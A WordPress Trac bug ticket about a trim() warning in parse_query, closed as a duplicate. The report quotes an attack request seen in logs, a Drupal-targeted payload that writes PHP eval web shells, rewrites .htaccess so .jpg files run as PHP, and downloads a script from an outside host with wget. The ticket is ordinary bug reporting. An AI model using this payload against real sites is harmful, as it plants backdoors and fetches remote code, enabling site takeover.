Opened 6 years ago
Closed 6 years ago
#46797 closed defect (bug) (duplicate)
parse_query: E_WARNING: trim() expects parameter 1 to be string, array given
Reported by: | conner_bw | Owned by: | |
---|---|---|---|
Milestone: | Priority: | normal | |
Severity: | normal | Version: | 5.1 |
Component: | Query | Keywords: | |
Focuses: | Cc: |
Description
We keep seeing E_WARNING: trim() expects parameter 1 to be string, array given in our New Relic logs.
The problem is this line of code:
$qv['name'] = trim( $qv['name'] );
A (malicious) user sends a request that looks like:
> GET /?q=user/password&name[#post_render][]=passthru&name[#type]=markup&name[#markup]=echo 'Vuln!! patch it Now!' > vuln.htm; echo 'Vuln!!<?php @eval($_POST['pass']) ?>'> sites/default/files/vuln.php; echo 'Vuln!!<?php @eval($_POST['pass']) ?>'> vuln.php; cd sites/default/files/; echo 'AddType application/x-httpd-php .jpg' > .htaccess; wget 'http://40k.waszmann.de/Deutsch/images/up.php'
Such a request makes $qv['name']
an array, not a string.
Needs to be sanitized.
Change History (1)
Note: See
TracTickets for help on using
tickets.
Hi there, thanks for the report!
We're already tracking this issue in #17737.